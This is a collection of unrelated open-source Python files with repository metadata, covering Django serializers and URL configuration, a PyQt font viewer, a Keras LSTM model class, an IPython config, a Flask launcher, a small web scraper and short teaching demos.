DK_DOC_SENT_WORD_OVERLAP_GRAPH = "doc_sent_word_overlap_graph"
DK_G2S_WID_GRAPH = "graph2seq_wid_graph"
SQGK_SRC_W_LIST = "src_word_list" # SQGK: SQuAD data reader keys
SQGK_SRC_IOB_LIST = "src_iob_list"
SQGK_SRC_POS_LIST = "src_pos_list"
SQGK_SRC_NER_LIST = "src_ner_list"
SQGK_TGT_W_LIST = "tgt_word_list"
SQGK_DATA_LIST = "data_list"
SQGK_IOB_T2I = "iob_t2i"
SQGK_POS_T2I = "pos_t2i"
SQGK_NER_T2I = "ner_t2i"
CHKPT_COMPLETED_EPOCHS = "completed_epochs" # CHKPT: checkpoint dict keys
CHKPT_MODEL = "model"
CHKPT_OPTIMIZER = "optimizer"
CHKPT_METADATA = "metadata"
CHKPT_PARAMS = "params"
CHKPT_BEST_EVAL_RESULT = "best_eval_result"
CHKPT_BEST_EVAL_EPOCH = "best_eval_epoch"
CHKPT_PAST_EVAL_RESULTS = "past_eval_results"
GK_EDGE_WEIGHT = "edge_weight" # GK: graph keys
GK_EDGE_WORD_PAIR = "edge_word_pair"
GK_EDGE_GV_IDX_PAIR = "edge_v_idx_pair"
GK_EDGE_TYPE = "edge_type"
GK_EDGE_DIR = "edge_directed"
GK_EDGE_UNDIR = "edge_undirected"
GK_SENT_DEP = "sentence_depends"
| [
"[email protected]"
] | |
d05b426c62a570e3558ce0569edad294e14a81f4 | b8e7611dc06d804f63db05fd25045b626ccbb067 | /CRM/event/serializer.py | 1dcbd9eb36ee10a02095145f94138d588ef08d0d | [
"MIT"
] | permissive | ydjabela/OCR_P12 | 5af7e4b4e7f7ab1cf6d427d99e65bfe5074b949e | 105364ea768c2adf3f0416dac7591639eec6d66a | refs/heads/main | 2023-05-30T06:16:15.514142 | 2021-06-11T08:04:28 | 2021-06-11T08:04:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | # Django REST Libs
from rest_framework import serializers
# Local Libs
from .models import Event
class EventSerializer(serializers.ModelSerializer):
"""
Event serializer
Based on serializers.ModelSerializer
"""
class Meta():
model = Event
fields = "__all__"
| [
"[email protected]"
] | |
373f958ddc1ae69c1864e555edf002dcc1ad119d | 7ac6ce76ddfdaee255454c41684cab67ed52a5b8 | /test_mo/urls.py | bb605fb2b4bbbc95526280136d8544d1504731c4 | [
"MIT"
] | permissive | Qmanes/test_mo | dc4825ae7995f6cbb18248b0e25f4a604f553a5b | f175f3d623d499473d88d2357769a3259b9b7484 | refs/heads/main | 2023-03-03T01:51:16.096580 | 2021-01-26T03:06:27 | 2021-01-26T03:06:27 | 332,954,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | """test_mo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('pokemons/', include('pokemons.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
32e70993541d9d1f2b8e64c11df221809bcf56e3 | c4d3ef434d1449294ba8b83a94a121253a2cfb48 | /http_main.py | 49d95bada9497a7d3276c4c7b8c20e31efe266c7 | [
"Apache-2.0"
] | permissive | RITCHIEHuang/qt-process | d7b6e2ecff220b3bb0e27b2a24b9c52981ae5b25 | e701a2992aa4690d1a5d79d741bf2339ca890ac4 | refs/heads/master | 2020-05-03T20:40:10.050494 | 2019-04-01T15:37:54 | 2019-04-01T15:37:54 | 178,807,657 | 0 | 1 | null | 2019-04-01T15:37:55 | 2019-04-01T07:20:48 | Python | UTF-8 | Python | false | false | 5,242 | py | import os
import sys
from shutil import rmtree
from PyQt5.QtCore import Qt, QDir # QPoint表示一个平面上整数精度的点坐标
from PyQt5.QtGui import QFontDatabase, QFont # QPainter绘制各种图形
from PyQt5.QtWidgets import *
# 设置窗体界面的大小, 以及网格的相关属性
import http_login
# 主窗体
from utils import delete_user_info
def print_info(function_name):
print("=" * 50 + function_name + "=" * 50)
class User(QMainWindow):
def __init__(self, fontfile, txtfile, parent=None):
super(User, self).__init__(parent)
self.ui_login = http_login.Window()
self.setWindowTitle("字体工具")
self.ROW_COUNT = 8
self.COLUMN_COUNT = 10
self.table = QTableWidget(self.ROW_COUNT, self.COLUMN_COUNT, self)
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
gridLayout = QGridLayout(self)
centralWidget.setLayout(gridLayout)
gridLayout.addWidget(self.table, 0, 0)
self.font_file = fontfile
self.txt_file = txtfile
self.user = None
self.setup_ui() # 初始化为UI控件
def setUser(self, user):
self.user = user
def setup_ui(self):
self.resize(800, 600)
# 菜单栏及事件绑定
menubar = self.menuBar()
menubar.setNativeMenuBar(False) # 自定义非系统原生菜单栏
menubar.setFixedHeight(30) # 设置固定高度展开菜单
file_menu = menubar.addMenu('& 文件')
help_menu = menubar.addMenu('& 帮助')
save_act = QAction('保存为', self)
save_act.setShortcut('Ctrl+S')
save_act.triggered.connect(self.slot_act_save_file) # 保存文件绑定保存文件Dialog
logout_act = QAction('注销', self)
logout_act.triggered.connect(self.slot_act_logout)
quit_act = QAction('退出', self)
quit_act.triggered.connect(self.slot_act_close) # 关闭窗体事件
# 事件加入菜单栏
file_menu.addAction(save_act)
file_menu.addSeparator() # 分隔符
file_menu.addAction(quit_act)
file_menu.addAction(logout_act)
self.create_table()
def create_table(self):
global font
print_info(sys._getframe().f_code.co_name)
self.table.verticalHeader().setHidden(True)
self.table.horizontalHeader().setHidden(True)
# 设置字体
fontId = QFontDatabase.addApplicationFont(self.font_file)
fontFamilies = QFontDatabase.applicationFontFamilies(fontId)
font = QFont(fontFamilies[0], 75)
# 设置文字
character_list = []
with open(self.txt_file, 'r', encoding="gbk") as f:
data = f.readlines()
for line in data:
for i in list(line.strip("\n")):
character_list.append(i)
print(character_list)
self.ROW_COUNT = max(self.ROW_COUNT, int(len(character_list) / self.COLUMN_COUNT))
print("row : %d, column: %d" % (self.ROW_COUNT, self.COLUMN_COUNT))
for i in range(self.COLUMN_COUNT):
self.table.setColumnWidth(i, 75)
for j in range(self.ROW_COUNT):
self.table.setRowHeight(j, 75)
t = 0
for i in range(self.ROW_COUNT):
for j in range(self.COLUMN_COUNT):
if t >= len(character_list):
break
item = QTableWidgetItem()
item.setTextAlignment(Qt.AlignCenter)
item.setFont(font)
item.setText(character_list[t])
self.table.setItem(i, j, item)
t = t + 1
# 将文本框的内容保存到新的文本文件中
def slot_act_save_file(self):
print_info(sys._getframe().f_code.co_name)
filename, filetype = QFileDialog.getSaveFileName(self, '另存为', '')
if filename == "":
print("\n取消选择")
return
print("\n你选择要保存的文件为:")
print(filename)
print(type(filename))
print("文件筛选器类型: ", filetype)
with open(self.font_file, 'rb') as f:
content = f.read()
with open(filename, 'wb') as f2:
f2.write(content)
# 弹出消息框
msg = QMessageBox(self)
msg.setInformativeText("保存到: " + filename)
msg.setWindowTitle("保存文件")
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
def closeEvent(self, event):
# 删除临时文件
self.delete_temp_files()
event.accept()
def slot_act_close(self):
reply = QMessageBox.question(self, 'Message', '你确认要退出么?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
self.close()
def slot_act_logout(self):
delete_user_info(self.user)
self.user = None
self.ui_login.show()
self.hide()
def delete_temp_files(self):
path = QDir.currentPath() + "/tmp/"
rmtree(path)
if __name__ == "__main__":
app = QApplication(sys.argv)
ui = User()
ui.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
8c96c6ea9120d6fdd77fe8c0844928dbe8da7bd4 | a0ed50752fb3bc3f3e2be0a483fb0a9064f0f00c | /core/model.py | ad7a61cc67d33f6af6d8cc2c64494286c74ab7bb | [] | no_license | Liu802313/LSTM-Neural-Network-for-Time-Series-Prediction | e798bbb548c94e38ffd48dbcb19eada72a033c56 | 5d0f57ce08da7745a7ad3ab3a69f5e26414aa1ee | refs/heads/master | 2021-09-24T17:40:39.843080 | 2018-10-12T03:25:20 | 2018-10-12T03:25:20 | 152,346,569 | 0 | 0 | null | 2018-10-10T01:48:34 | 2018-10-10T01:48:34 | null | UTF-8 | Python | false | false | 4,200 | py | import os
import math
import numpy as np
import datetime as dt
from numpy import newaxis
from core.utils import Timer
from keras.layers import Dense, Activation, Dropout, LSTM
from keras.models import Sequential, load_model
from keras.callbacks import EarlyStopping, ModelCheckpoint
class Model():
"""A class for an building and inferencing an lstm model"""
def __init__(self):
self.model = Sequential()
def load_model(self, filepath):
print('[Model] Loading model from file %s' % filepath)
self.model = load_model(filepath)
def build_model(self, configs):
timer = Timer()
timer.start()
for layer in configs['model']['layers']:
neurons = layer['neurons'] if 'neurons' in layer else None
dropout_rate = layer['rate'] if 'rate' in layer else None
activation = layer['activation'] if 'activation' in layer else None
return_seq = layer['return_seq'] if 'return_seq' in layer else None
input_timesteps = layer['input_timesteps'] if 'input_timesteps' in layer else None
input_dim = layer['input_dim'] if 'input_dim' in layer else None
if layer['type'] == 'dense':
self.model.add(Dense(neurons, activation=activation))
if layer['type'] == 'lstm':
self.model.add(LSTM(neurons, input_shape=(input_timesteps, input_dim), return_sequences=return_seq))
if layer['type'] == 'dropout':
self.model.add(Dropout(dropout_rate))
self.model.compile(loss=configs['model']['loss'], optimizer=configs['model']['optimizer'])
print('[Model] Model Compiled')
timer.stop()
def train(self, x, y, epochs, batch_size):
timer = Timer()
timer.start()
print('[Model] Training Started')
print('[Model] %s epochs, %s batch size' % (epochs, batch_size))
save_fname = 'saved_models/%s-e%s.h5' % (dt.datetime.now().strftime('%d%m%Y-%H%M%S'), str(epochs))
callbacks = [
EarlyStopping(monitor='val_loss', patience=2),
ModelCheckpoint(filepath=save_fname, monitor='val_loss', save_best_only=True)
]
self.model.fit(
x,
y,
epochs=epochs,
batch_size=batch_size,
callbacks=callbacks
)
self.model.save(save_fname)
print('[Model] Training Completed. Model saved as %s' % save_fname)
timer.stop()
def train_generator(self, data_gen, epochs, batch_size, steps_per_epoch):
timer = Timer()
timer.start()
print('[Model] Training Started')
print('[Model] %s epochs, %s batch size, %s batches per epoch' % (epochs, batch_size, steps_per_epoch))
save_fname = 'saved_models/%s-e%s.h5' % (dt.datetime.now().strftime('%d%m%Y-%H%M%S'), str(epochs))
callbacks = [
ModelCheckpoint(filepath=save_fname, monitor='loss', save_best_only=True)
]
self.model.fit_generator(
data_gen,
steps_per_epoch=steps_per_epoch,
epochs=epochs,
callbacks=callbacks,
workers=1
)
print('[Model] Training Completed. Model saved as %s' % save_fname)
timer.stop()
def predict_point_by_point(self, data):
#Predict each timestep given the last sequence of true data, in effect only predicting 1 step ahead each time
predicted = self.model.predict(data)
predicted = np.reshape(predicted, (predicted.size,))
return predicted
def predict_sequences_multiple(self, data, window_size, prediction_len):
#Predict sequence of 50 steps before shifting prediction run forward by 50 steps
prediction_seqs = []
for i in range(int(len(data)/prediction_len)):
curr_frame = data[i*prediction_len]
predicted = []
for j in range(prediction_len):
predicted.append(self.model.predict(curr_frame[newaxis,:,:])[0,0])
curr_frame = curr_frame[1:]
curr_frame = np.insert(curr_frame, [window_size-2], predicted[-1], axis=0)
prediction_seqs.append(predicted)
return prediction_seqs
def predict_sequence_full(self, data, window_size):
#Shift the window by 1 new prediction each time, re-run predictions on new window
curr_frame = data[0]
predicted = []
for i in range(len(data)):
predicted.append(self.model.predict(curr_frame[newaxis,:,:])[0,0])
curr_frame = curr_frame[1:]
curr_frame = np.insert(curr_frame, [window_size-2], predicted[-1], axis=0)
return predicted
| [
"[email protected]"
] | |
d96b1df7ff514b35656306fc3610338089e4842e | 2c8efabdc717946402e191eee6653bc46c188223 | /oect_processing/__init__.py | 05005fd407169b4bafb783be5272c0b057f3665b | [] | no_license | rajgiriUW/OECT_processing | 643eb0342d82dd7a63e94a3ab1ddc33aadd379ab | 0db3cf492a3e56f676cd04c62d0cda8d62eba22b | refs/heads/master | 2023-07-06T19:31:18.821966 | 2023-06-23T21:52:34 | 2023-06-23T21:52:34 | 111,010,935 | 1 | 1 | null | 2021-04-12T07:10:23 | 2017-11-16T19:05:54 | Jupyter Notebook | UTF-8 | Python | false | false | 217 | py | from . import oect_utils
#import nonoect_utils
#import specechem
from .oect import OECT
from .oect_device import OECTDevice
__all__ = oect_utils.__all__
#__all__ += nonoect_utils.__all__
#__all__ += specechem.__all__ | [
"[email protected]"
] | |
62b1de7a99fc7f74b2b883ee7c9d8c69a7e30f5a | d2d9712a9a028707fab199c1eb835052ac8e60b7 | /home/.ipython/profile_default/ipython_config.py | c63f614f64d9bf41c78bce3ed6b871bc68355990 | [] | no_license | kei10in/dotfiles-old | f5b384f6fedfc125f85e46bb35c4bd79069a8179 | 1be78223c197eaac682f9075644456e120c96e78 | refs/heads/master | 2022-04-09T15:39:34.772951 | 2020-03-12T13:25:14 | 2020-03-12T13:25:14 | 2,340,600 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,058 | py | # -*- coding: utf-8 -*-
# Configuration file for ipython.
c = get_config()
#------------------------------------------------------------------------------
# InteractiveShellApp configuration
#------------------------------------------------------------------------------
# A Mixin for applications that start InteractiveShell instances.
#
# Provides configurables for loading extensions and executing files as part of
# configuring a Shell environment.
#
# Provides init_extensions() and init_code() methods, to be called after
# init_shell(), which must be implemented by subclasses.
# Execute the given command string.
# c.InteractiveShellApp.code_to_run = ''
# lines of code to run at IPython startup.
# c.InteractiveShellApp.exec_lines = []
# If true, an 'import *' is done from numpy and pylab, when using pylab
# c.InteractiveShellApp.pylab_import_all = True
# A list of dotted module names of IPython extensions to load.
# c.InteractiveShellApp.extensions = []
# dotted module name of an IPython extension to load.
# c.InteractiveShellApp.extra_extension = ''
# List of files to run at IPython startup.
# c.InteractiveShellApp.exec_files = []
# A file to be run
# c.InteractiveShellApp.file_to_run = ''
#------------------------------------------------------------------------------
# TerminalIPythonApp configuration
#------------------------------------------------------------------------------
# TerminalIPythonApp will inherit config from: BaseIPythonApplication,
# Application, InteractiveShellApp
# Execute the given command string.
# c.TerminalIPythonApp.code_to_run = ''
# The IPython profile to use.
# c.TerminalIPythonApp.profile = 'default'
# Set the log level by value or name.
# c.TerminalIPythonApp.log_level = 30
# lines of code to run at IPython startup.
# c.TerminalIPythonApp.exec_lines = []
# Enable GUI event loop integration ('qt', 'wx', 'gtk', 'glut', 'pyglet').
# c.TerminalIPythonApp.gui = None
# Pre-load matplotlib and numpy for interactive use, selecting a particular
# matplotlib backend and loop integration.
# c.TerminalIPythonApp.pylab = None
# Suppress warning messages about legacy config files
# c.TerminalIPythonApp.ignore_old_config = False
# Create a massive crash report when IPython enconters what may be an internal
# error. The default is to append a short message to the usual traceback
# c.TerminalIPythonApp.verbose_crash = False
# If a command or file is given via the command-line, e.g. 'ipython foo.py
# c.TerminalIPythonApp.force_interact = False
# If true, an 'import *' is done from numpy and pylab, when using pylab
# c.TerminalIPythonApp.pylab_import_all = True
# The name of the IPython directory. This directory is used for logging
# configuration (through profiles), history storage, etc. The default is usually
# $HOME/.ipython. This options can also be specified through the environment
# variable IPYTHON_DIR.
# c.TerminalIPythonApp.ipython_dir = '/Users/keisuke/.config/ipython'
# Whether to display a banner upon starting IPython.
# c.TerminalIPythonApp.display_banner = True
# Start IPython quickly by skipping the loading of config files.
# c.TerminalIPythonApp.quick = False
# A list of dotted module names of IPython extensions to load.
# c.TerminalIPythonApp.extensions = []
# Whether to install the default config files into the profile dir. If a new
# profile is being created, and IPython contains config files for that profile,
# then they will be staged into the new directory. Otherwise, default config
# files will be automatically generated.
# c.TerminalIPythonApp.copy_config_files = False
# dotted module name of an IPython extension to load.
# c.TerminalIPythonApp.extra_extension = ''
# List of files to run at IPython startup.
# c.TerminalIPythonApp.exec_files = []
# Whether to overwrite existing config files when copying
# c.TerminalIPythonApp.overwrite = False
# A file to be run
# c.TerminalIPythonApp.file_to_run = ''
#------------------------------------------------------------------------------
# TerminalInteractiveShell configuration
#------------------------------------------------------------------------------
# TerminalInteractiveShell will inherit config from: InteractiveShell
# auto editing of files with syntax errors.
# c.TerminalInteractiveShell.autoedit_syntax = False
# Use colors for displaying information about objects. Because this information
# is passed through a pager (like 'less'), and some pagers get confused with
# color codes, this capability can be turned off.
# c.TerminalInteractiveShell.color_info = True
#
# c.TerminalInteractiveShell.history_length = 10000
# Don't call post-execute functions that have failed in the past.
# c.TerminalInteractiveShell.disable_failing_post_execute = False
# Show rewritten input, e.g. for autocall.
# c.TerminalInteractiveShell.show_rewritten_input = True
# Set the color scheme (NoColor, Linux, or LightBG).
# c.TerminalInteractiveShell.colors = 'LightBG'
# Autoindent IPython code entered interactively.
# c.TerminalInteractiveShell.autoindent = True
#
# c.TerminalInteractiveShell.separate_in = '\n'
# Deprecated, use PromptManager.in2_template
# c.TerminalInteractiveShell.prompt_in2 = ' .\\D.: '
#
# c.TerminalInteractiveShell.separate_out = ''
# Deprecated, use PromptManager.in_template
# c.TerminalInteractiveShell.prompt_in1 = 'In [\\#]: '
# Enable deep (recursive) reloading by default. IPython can use the deep_reload
# module which reloads changes in modules recursively (it replaces the reload()
# function, so you don't need to change anything to use it). deep_reload()
# forces a full reload of modules whose code may have changed, which the default
# reload() function does not. When deep_reload is off, IPython will use the
# normal reload(), but deep_reload will still be available as dreload().
# c.TerminalInteractiveShell.deep_reload = False
# Make IPython automatically call any callable object even if you didn't type
# explicit parentheses. For example, 'str 43' becomes 'str(43)' automatically.
# The value can be '0' to disable the feature, '1' for 'smart' autocall, where
# it is not applied if there are no more arguments on the line, and '2' for
# 'full' autocall, where all callable objects are automatically called (even if
# no arguments are present).
# c.TerminalInteractiveShell.autocall = 0
# Number of lines of your screen, used to control printing of very long strings.
# Strings longer than this number of lines will be sent through a pager instead
# of directly printed. The default value for this is 0, which means IPython
# will auto-detect your screen size every time it needs to print certain
# potentially long strings (this doesn't change the behavior of the 'print'
# keyword, it's only triggered internally). If for some reason this isn't
# working well (it needs curses support), specify it yourself. Otherwise don't
# change the default.
# c.TerminalInteractiveShell.screen_length = 0
# Set the editor used by IPython (default to $EDITOR/vi/notepad).
# c.TerminalInteractiveShell.editor = 'emacs'
# Deprecated, use PromptManager.justify
# c.TerminalInteractiveShell.prompts_pad_left = True
# The part of the banner to be printed before the profile
# c.TerminalInteractiveShell.banner1 = 'Python 3.2.3 (default, Apr 19 2012, 22:49:48) \nType "copyright", "credits" or "license" for more information.\n\nIPython 0.12.1 -- An enhanced Interactive Python.\n? -> Introduction and overview of IPython\'s features.\n%quickref -> Quick reference.\nhelp -> Python\'s own help system.\nobject? -> Details about \'object\', use \'object??\' for extra details.\n'
#
# c.TerminalInteractiveShell.readline_parse_and_bind = ['tab: complete', '"\\C-l": clear-screen', 'set show-all-if-ambiguous on', '"\\C-o": tab-insert', '"\\C-r": reverse-search-history', '"\\C-s": forward-search-history', '"\\C-p": history-search-backward', '"\\C-n": history-search-forward', '"\\e[A": history-search-backward', '"\\e[B": history-search-forward', '"\\C-k": kill-line', '"\\C-u": unix-line-discard']
# The part of the banner to be printed after the profile
# c.TerminalInteractiveShell.banner2 = ''
#
# c.TerminalInteractiveShell.separate_out2 = ''
#
# c.TerminalInteractiveShell.wildcards_case_sensitive = True
#
# c.TerminalInteractiveShell.debug = False
# Set to confirm when you try to exit IPython with an EOF (Control-D in Unix,
# Control-Z/Enter in Windows). By typing 'exit' or 'quit', you can force a
# direct exit without any confirmation.
# c.TerminalInteractiveShell.confirm_exit = True
#
# c.TerminalInteractiveShell.ipython_dir = ''
#
# c.TerminalInteractiveShell.readline_remove_delims = '-/~'
# Start logging to the default log file.
# c.TerminalInteractiveShell.logstart = False
# The name of the logfile to use.
# c.TerminalInteractiveShell.logfile = ''
# The shell program to be used for paging.
# c.TerminalInteractiveShell.pager = 'less'
# Enable magic commands to be called without the leading %.
# c.TerminalInteractiveShell.automagic = True
# Save multi-line entries as one entry in readline history
# c.TerminalInteractiveShell.multiline_history = True
#
# c.TerminalInteractiveShell.readline_use = True
# Start logging to the given file in append mode.
# c.TerminalInteractiveShell.logappend = ''
#
# c.TerminalInteractiveShell.xmode = 'Context'
#
# c.TerminalInteractiveShell.quiet = False
# Enable auto setting the terminal title.
# c.TerminalInteractiveShell.term_title = False
#
# c.TerminalInteractiveShell.object_info_string_level = 0
# Deprecated, use PromptManager.out_template
# c.TerminalInteractiveShell.prompt_out = 'Out[\\#]: '
# Set the size of the output cache. The default is 1000, you can change it
# permanently in your config file. Setting it to 0 completely disables the
# caching system, and the minimum value accepted is 20 (if you provide a value
# less than 20, it is reset to 0 and a warning is issued). This limit is
# defined because otherwise you'll spend more time re-flushing a too small cache
# than working
# c.TerminalInteractiveShell.cache_size = 1000
# Automatically call the pdb debugger after every exception.
# c.TerminalInteractiveShell.pdb = False
#------------------------------------------------------------------------------
# PromptManager configuration
#------------------------------------------------------------------------------
# This is the primary interface for producing IPython's prompts.
# Output prompt. '\#' will be transformed to the prompt number
# c.PromptManager.out_template = 'Out[\\#]: '
# Continuation prompt.
# c.PromptManager.in2_template = ' .\\D.: '
# If True (default), each prompt will be right-aligned with the preceding one.
# c.PromptManager.justify = True
# Input prompt. '\#' will be transformed to the prompt number
c.PromptManager.in_template = '{color.LightBlue}\\w\n{color.LightCyan}>>> '
#
# c.PromptManager.color_scheme = 'Linux'
#------------------------------------------------------------------------------
# ProfileDir configuration
#------------------------------------------------------------------------------
# An object to manage the profile directory and its resources.
#
# The profile directory is used by all IPython applications, to manage
# configuration, logging and security.
#
# This object knows how to find, create and manage these directories. This
# should be used by any code that wants to handle profiles.
# Set the profile location directly. This overrides the logic used by the
# `profile` option.
# c.ProfileDir.location = ''
#------------------------------------------------------------------------------
# PlainTextFormatter configuration
#------------------------------------------------------------------------------
# The default pretty-printer.
#
# This uses :mod:`IPython.lib.pretty` to compute the format data of the object.
# If the object cannot be pretty printed, :func:`repr` is used. See the
# documentation of :mod:`IPython.lib.pretty` for details on how to write pretty
# printers. Here is a simple example::
#
# def dtype_pprinter(obj, p, cycle):
# if cycle:
# return p.text('dtype(...)')
# if hasattr(obj, 'fields'):
# if obj.fields is None:
# p.text(repr(obj))
# else:
# p.begin_group(7, 'dtype([')
# for i, field in enumerate(obj.descr):
# if i > 0:
# p.text(',')
# p.breakable()
# p.pretty(field)
# p.end_group(7, '])')
# PlainTextFormatter will inherit config from: BaseFormatter
#
# c.PlainTextFormatter.type_printers = {}
#
# c.PlainTextFormatter.newline = '\n'
#
# c.PlainTextFormatter.float_precision = ''
#
# c.PlainTextFormatter.verbose = False
#
# c.PlainTextFormatter.deferred_printers = {}
#
# c.PlainTextFormatter.pprint = True
#
# c.PlainTextFormatter.max_width = 79
#
# c.PlainTextFormatter.singleton_printers = {}
#------------------------------------------------------------------------------
# IPCompleter configuration
#------------------------------------------------------------------------------
# Extension of the completer class with IPython-specific features
# IPCompleter will inherit config from: Completer
# Instruct the completer to omit private method names
#
# Specifically, when completing on ``object.<tab>``.
#
# When 2 [default]: all names that start with '_' will be excluded.
#
# When 1: all 'magic' names (``__foo__``) will be excluded.
#
# When 0: nothing will be excluded.
# c.IPCompleter.omit__names = 2
# Whether to merge completion results into a single list
#
# If False, only the completion results from the first non-empty completer will
# be returned.
# c.IPCompleter.merge_completions = True
# Activate greedy completion
#
# This will enable completion on elements of lists, results of function calls,
# etc., but can be unsafe because the code is actually evaluated on TAB.
# c.IPCompleter.greedy = False
| [
"[email protected]"
] | |
cbd4fffa89d3721fb45c73392b5d55aa7d22d7eb | fc79b08e3d8f16c88e57b8674eebd5a610ababdc | /globomap_api/run.py | df2b60a8b03bdffcafb07f13a7d993d0cfcff688 | [] | no_license | victor-mendes-eduardo/globomap-api | e8b95cf33269c92c927ca30c7092d33f0f8e8cac | c1cce956eb4fdfb178bc32cc8ed60605e547c7f3 | refs/heads/master | 2021-01-15T19:06:51.094379 | 2017-08-07T19:29:20 | 2017-08-07T19:29:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | import logging
from logging.handlers import RotatingFileHandler
from os import environ
from app import create_app
if __name__ == '__main__':
application = create_app('config')
handler = RotatingFileHandler('foo.log', maxBytes=10000, backupCount=1)
handler.setLevel(logging.INFO)
application.logger.addHandler(handler)
application.run('0.0.0.0', int(environ.get('PORT', '5000')))
| [
"[email protected]"
] | |
99f106571951309d30c6c2ad0f813c3924e240d1 | eba57b688107b20438ad3035359e677909997371 | /chapter_2/html_parsing.py | 50711c9bad2815bfa5928e5bc5e0271dde1c64a9 | [] | no_license | kerenskybr/pratical_nlp_book | 3c7ea19c0ebf9af3be4864c3fcb205552c69936d | dc11fac65a92aa5b2878c080658f24aaaf05dfdb | refs/heads/main | 2023-05-03T13:21:31.013796 | 2021-05-14T14:30:02 | 2021-05-14T14:30:02 | 367,171,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | from bs4 import BeautifulSoup
from urllib.request import urlopen
myurl = 'https://stackoverflow.com/questions/415511/how-to-get-the-current-time-in-python'
html = urlopen(myurl).read()
soupfied = BeautifulSoup(html, "html.parser")
question = soupfied.find("div", {"class":"question"})
questiontext = question.find("div", {"class":"s-prose"})
print("Question: \n", questiontext.get_text().strip())
answer = soupfied.find("div", {"class": "answer"})
answertext = answer.find("div", {"class":"s-prose"})
print("Best answer: \n", answertext.get_text().strip()) | [
"[email protected]"
] | |
f45946dfed7777fc15b4a74ece44cbbc88ec96ea | 62286a2f8f717b156c15a2671159e5870db9e964 | /src/schemas/BudgetSchema.py | d0b72e7f2293fe56430c7bf3475eaa6e56c9dac1 | [] | no_license | HarryTranAU/my_money_app | c44026e6c0d9613d63fedca5a9c1b77d6fc796cc | eb34fb708ed4d844c8ca1cfe1a1a5e9af1b2e0d3 | refs/heads/main | 2023-01-15T16:19:42.779324 | 2020-11-24T08:58:44 | 2020-11-24T08:58:44 | 305,883,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | from main import ma
from models.Budget import Budget
from schemas.UserSchema import UserSchema
from marshmallow.validate import Length
class BudgetSchema(ma.SQLAlchemyAutoSchema):
class Meta:
model = Budget
name = ma.String(required=True, validate=Length(min=1))
user = ma.Nested(UserSchema)
budget_schema = BudgetSchema()
budgets_schema = BudgetSchema(many=True)
| [
"[email protected]"
] | |
ad31f228980176aeeadc3048937a55e51ab81b67 | bb598592744413b1500b85853a990cbc3bde7d1b | /random_demos/xml_minidom.py | 88bc8ea853b3f02f14cf57a11838502b68f44c00 | [
"MIT"
] | permissive | t4d-classes/advanced-python_11012021 | dabe784a81f4c45c85575aef4c7b9aeb054024f6 | a365382c6d8f06ae13fa54719935dcb229a35053 | refs/heads/main | 2023-08-30T10:25:04.345819 | 2021-11-06T00:05:58 | 2021-11-06T00:05:58 | 423,454,737 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | from xml.dom import minidom
# parse an xml file by name
file = minidom.parse('sample.xml')
#use getElementsByTagName() to get tag
colors = file.getElementsByTagName('color')
# one specific item attribute
print(colors[1].attributes['hex'].value)
# all item attributes
for color in colors:
print(color.attributes['hex'].value)
# one specific item's data
print(colors[1].firstChild.data)
print(colors[1].childNodes[0].data)
# all items data
for color in colors:
print(color.firstChild.data) | [
"[email protected]"
] | |
fe16e2e20b608f33ab3733a7142c1e62a8e6bb16 | b847c1bb6ccdb57aaf860da1d1bfc762799e54f7 | /07_语法进阶/sin_09_加等于.py | e7696477b91ad5d08cb973d3a4a86d272dfa9a57 | [] | no_license | numRandom/new_pythonCode | 2d4dba8220d9c87794cd8ff6ce401d91770d1360 | 5f7eb14ed76b5d007475138d033e991e4e85baf7 | refs/heads/master | 2020-12-27T13:57:03.887078 | 2020-02-06T10:27:11 | 2020-02-06T10:27:11 | 237,926,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 357 | py | def demo(num,num_list):
print("函数开始")
num += num
# 列表变量使用 += 不会做相加再赋值的操作!
# 本质上是在调用 extend 方法
num_list += num_list
print(num)
print(num_list)
print("函数完成")
gl_num = 9
gl_list = [1,2,3]
demo(gl_num,gl_list)
print(gl_num)
print(gl_list) | [
"[email protected]"
] | |
b67ef1caee31870b006529104a537bcb51f25871 | 4e1d6978daf95140b9b02d9454af76e225bd6537 | /blog/forms.py | d2c828db50a5c1e3577e219a547965f24369fb2a | [
"MIT"
] | permissive | hairinhi/practice_django | afce74d22c1f0b8b3e7fa0acbc4c2f6f7b0d8c20 | db4442f299c3d5c4e03c38e43b1399b5c53dd57f | refs/heads/master | 2022-02-16T18:44:33.587226 | 2019-08-18T01:43:33 | 2019-08-18T01:43:33 | 197,946,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from django import forms
from .models import Blog
class BlogForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea(attrs={'rows':15, 'cols':120}))
class Meta:
model = Blog
fields = ["content"]
| [
"[email protected]"
] | |
